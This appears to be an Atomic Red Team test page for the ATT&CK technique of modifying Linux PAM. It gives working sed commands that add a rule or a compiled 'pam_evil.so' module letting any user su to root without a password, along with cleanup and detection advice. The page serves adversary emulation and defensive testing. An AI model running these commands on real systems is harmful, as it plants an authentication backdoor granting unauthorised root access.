# T1556.003 - Pluggable Authentication Modules
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)

## Atomic Tests

### Atomic Test #1 - Malicious PAM ruleInserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo sed -i "1s,^,auth sufficient pam_succeed_if.so uid >= 0\n,g" /etc/pam.d/su-l
```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 1

#### Cleanup: 
```sh
sudo sed -i "\,auth sufficient pam_succeed_if.so uid >= 0,d" /etc/pam.d/su-l
```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Malicious PAM rule (freebsd)Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo sed -i "" "8s,^,auth sufficient pam_succeed_if.so uid >= 0\n,g" /etc/pam.d/su
```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 2

#### Cleanup: 
```sh
sudo sed -i "" "/auth sufficient pam_succeed_if.so uid >= 0/d" /etc/pam.d/su
```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Malicious PAM module
Creates a PAM module, inserts a rule to use it, and then tests it.

Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: The PAM development library must be installed to build the PAM module

##### Check Prereq Commands:
```sh
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi

```
##### Description: The PAM module must exist on disk at specified location (#{path_to_pam_module})

##### Check Prereq Commands:
```sh
if [ -f /tmp/pam_evil.so ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
sudo gcc -shared -fPIC -o /tmp/pam_evil.so PathToAtomicsFolder/T1556.003/src/pam_evil.c

```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sudo sed -i "1s,^,auth sufficient /tmp/pam_evil.so\n,g" /etc/pam.d/su-l
```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 3

#### Cleanup: 
```sh
sudo sed -i "\,auth sufficient /tmp/pam_evil.so,d" /etc/pam.d/su-l
```

In [ ]:
Invoke-AtomicTest T1556.003 -TestNumbers 3 -Cleanup

## Detection
Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.

Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).